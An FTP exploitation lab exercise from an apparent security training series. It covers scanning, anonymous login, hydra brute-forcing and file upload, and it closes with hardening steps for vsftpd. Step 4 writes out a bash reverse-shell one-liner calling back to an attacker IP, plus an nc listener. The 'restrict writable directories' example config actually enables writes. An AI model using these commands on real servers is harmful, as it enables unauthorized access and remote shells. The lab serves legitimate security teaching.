Exercise 29: Exploiting Insecure FTP Configurations

Objective: Exploit FTP server misconfigurations, such as anonymous access or weak authentication, to gain unauthorized access to files, and learn how to secure FTP servers against such vulnerabilities.

---

Scenario: FTP (File Transfer Protocol) is commonly used for transferring files across a network. Misconfigured FTP servers, such as those allowing anonymous access or weak credentials, can expose sensitive data to unauthorized users. Your task is to identify and exploit these vulnerabilities and secure the FTP server.

---

Lab Setup

1. Environment:
   • A Linux system running an FTP server (e.g., vsftpd) with intentional misconfigurations.
   • Anonymous or weak credentials enabled for testing.
2. Tools Required:
   • ftp client or smbclient for interaction.
   • nmap for network scanning.

---

Lab Steps

Step 1: Identify Open FTP Servers

1. Use nmap to scan for open FTP ports on the network: nmap -p 21 --script=ftp-anon,ftp-brute <target_ip>
   • Replace <target_ip> with the IP address of the target system.
   • Example output: 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed
2. Verify that the FTP service is running and accessible: ftp <target_ip>

Step 2: Test for Anonymous Login

1. Attempt to log in as an anonymous user: ftp <target_ip> Name: anonymous Password: <any_email>
2. List files and directories on the server: ls
3. Download files for further analysis: get <filename>

Step 3: Perform a Brute-Force Attack

1. Use a brute-force tool like hydra to test for weak credentials: hydra -l admin -P passwords.txt ftp://<target_ip>
   • Replace passwords.txt with a wordlist of weak passwords.
2. Log in using discovered credentials: ftp <target_ip>

Step 4: Exploit Writable Directories

1. Identify writable directories: mkdir test
2. Upload a malicious file to the writable directory: put malicious.txt
3. If the server allows script execution, upload a reverse shell script: echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' > reverse_shell.sh put reverse_shell.sh
4. Set up a listener on your machine: nc -lvnp 4444
5. Trigger the malicious file to gain access.

---

Solution

Explanation:

• FTP servers with misconfigurations, such as allowing anonymous access or weak credentials, expose sensitive data.
• Writable directories can be exploited to upload malicious files.

Prevention:

1. Disable Anonymous Access:
   • Edit the FTP configuration file (e.g., /etc/vsftpd.conf) and set: anonymous_enable=NO
2. Enforce Strong Passwords:
   • Use tools like pam_pwquality to enforce strong password policies.
   • Configure /etc/security/pwquality.conf with rules for minimum password length and complexity.
3. Restrict Writable Directories:
   • Limit write permissions to trusted users only.
   • Example configuration for /etc/vsftpd.conf: write_enable=YES local_enable=YES
4. Enable Encryption:
   • Use FTPS (FTP Secure) to encrypt data in transit.
5. Monitor and Audit Access:
   • Log all FTP activities for auditing: sudo cat /var/log/vsftpd.log

---

Testing and Verification

1. Attempt to log in as an anonymous user after disabling anonymous access to confirm it is restricted.
2. Verify that writable directories are restricted to authorized users only.
3. Test encryption by ensuring FTP connections use TLS.

---

Reflection

This exercise demonstrates the risks posed by insecure FTP configurations and how attackers can exploit them. By identifying vulnerabilities and applying mitigations, you’ve gained practical experience in securing FTP services.